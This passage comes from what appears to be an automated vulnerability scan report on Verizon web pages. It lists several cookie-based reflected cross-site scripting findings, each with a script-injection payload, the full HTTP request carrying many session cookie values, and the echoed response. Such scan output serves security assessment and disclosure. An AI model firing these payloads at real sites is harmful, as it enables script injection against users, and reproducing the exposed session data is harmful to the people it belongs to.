LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58577
Expires: Sat, 20 Nov 2010 02:52:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:52:21 GMT
Connection: close
Set-Cookie: ContextInfo_LoopQual=; path=/
Set-Cookie: ContextInfo_State=TXd6663'><script>alert(1)</script>7127b0cbbb7; path=/


<html xmlns:vz>
<head id="_ctl0_head"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><title>
   Verizon | FiOS TV Availability
</title>
<style>
.channel_list .essent
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD6663'><SCRIPT>ALERT(1)</SCRIPT>7127B0CBBB7 ' />
...[SNIP]...

3.282. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 3c7ba<script>alert(1)</script>61b8323e3a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX3c7ba<script>alert(1)</script>61b8323e3a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79330
Expires: Sat, 20 Nov 2010 02:57:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX3c7ba<script>alert(1)</script>61b8323e3a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:07 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:07 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:07 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3C7BA<SCRIPT>ALERT(1)</SCRIPT>61B8323E3A </DIV>
...[SNIP]...

3.283. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7319b'><script>alert(1)</script>b412aee3463 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX7319b'><script>alert(1)</script>b412aee3463; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79336
Expires: Sat, 20 Nov 2010 02:56:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX7319b'><script>alert(1)</script>b412aee3463; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7319B'><SCRIPT>ALERT(1)</SCRIPT>B412AEE3463 ' />
...[SNIP]...

3.284. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [dotcomsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 226d7"-alert(1)-"1d917d73025 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=226d7"-alert(1)-"1d917d73025; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 85594
Expires: Sat, 20 Nov 2010 02:56:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "226d7"-alert(1)-"1d917d73025"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: docu
...[SNIP]...

3.285. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af320'><script>alert(1)</script>638530528ed was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXaf320'><script>alert(1)</script>638530528ed; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
